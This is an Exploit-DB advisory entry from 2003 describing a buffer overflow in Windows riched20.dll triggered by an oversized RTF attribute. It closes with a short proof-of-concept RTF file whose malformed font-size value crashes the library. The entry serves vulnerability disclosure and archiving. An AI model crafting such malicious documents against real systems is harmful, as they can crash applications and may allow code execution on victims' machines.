Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability

2003-02-17T00:00:00
ID EDB-ID:22255
Type exploitdb
Reporter Jie Dong
Modified 2003-02-17T00:00:00

Description

Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/6874/info

The riched20.dll is vulnerable to a buffer overflow that results in the application calling the library to fail. By creating a Rich Text Format (RTF) file with more than 65536 bytes of data in an attribute, the buffer will be overrun.

Execution of arbitrary code may be possible.

RTF files may be opened automatically by Internet Explorer and Outlook.

** Some reports indicate that this vulnerability could not be reproduced on riched20.dll v.3.0 (5.30.23.1200) running on Windows NT or riched20.dll v.3.0 (5.30.23.1211) running on Windows XP. 

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}